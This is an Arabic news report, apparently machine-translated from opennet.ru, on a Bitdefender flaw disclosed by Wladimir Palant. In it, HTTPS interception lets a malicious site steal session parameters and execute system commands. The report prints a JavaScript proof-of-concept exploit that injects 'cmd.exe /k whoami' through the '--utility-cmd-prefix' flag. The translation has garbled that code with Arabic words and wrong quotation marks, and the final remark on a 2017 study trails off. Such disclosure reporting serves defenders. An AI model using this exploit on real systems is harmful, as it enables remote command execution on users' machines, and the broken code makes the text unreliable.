فلاديمير بالانت، مبتكر Adblock Plus،
سبب المشكلة هو أن برنامج مكافحة الفيروسات Bitdefender يقوم باعتراض محلي لحركة مرور HTTPS عن طريق استبدال شهادة TLS الأصلية للموقع. يتم تثبيت شهادة جذر إضافية على نظام العميل، مما يجعل من الممكن إخفاء تشغيل نظام التفتيش المروري المستخدم. يقوم برنامج مكافحة الفيروسات بدمج نفسه في حركة مرور محمية ويقوم بإدراج كود JavaScript الخاص به في بعض الصفحات لتنفيذ وظيفة البحث الآمن، وفي حالة حدوث مشكلات في شهادة الاتصال الآمن، فإنه يستبدل صفحة الخطأ التي تم إرجاعها بصفحته الخاصة. نظرًا لأنه يتم تقديم صفحة الخطأ الجديدة نيابة عن الخادم الذي يتم فتحه، تتمتع الصفحات الأخرى الموجودة على هذا الخادم بإمكانية الوصول الكامل إلى المحتوى المدرج بواسطة Bitdefender.
عند فتح موقع يتحكم فيه أحد المهاجمين، يمكن لهذا الموقع إرسال XMLHttpRequest والتظاهر بوجود مشكلات في شهادة HTTPS عند الاستجابة، مما سيؤدي إلى عودة صفحة خطأ منتحلة بواسطة Bitdefender. وبما أن صفحة الخطأ مفتوحة في سياق نطاق المهاجم، فيمكنه قراءة محتويات الصفحة المخادعة باستخدام معلمات Bitdefender. تحتوي الصفحة المقدمة من Bitdefender أيضًا على مفتاح جلسة يسمح لك باستخدام واجهة برمجة تطبيقات Bitdefender الداخلية لبدء جلسة متصفح Safepay منفصلة، وتحديد إشارات سطر أوامر عشوائية، وإطلاق أي أوامر نظام باستخدام "--utility-cmd-prefix" علَم. مثال على استغلال (param1 وparam2 هي القيم التي تم الحصول عليها من صفحة الخطأ):
طلب var = XMLHttpRequest () جديد ،
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
ولنتذكر أن دراسة أجريت في عام 2017
قدم 11 منتجًا فقط من أصل 26 منتجًا مجموعات تشفير حالية. 5 أنظمة لم تتحقق من الشهادات (Kaspersky Internet Security 16 Mac، NOD32 AV 9، CYBERsitter، Net Nanny 7 Win، Net Nanny 7 Mac). تعرضت منتجات Kaspersky Internet Security وTotal Security للهجوم
المصدر: opennet.ru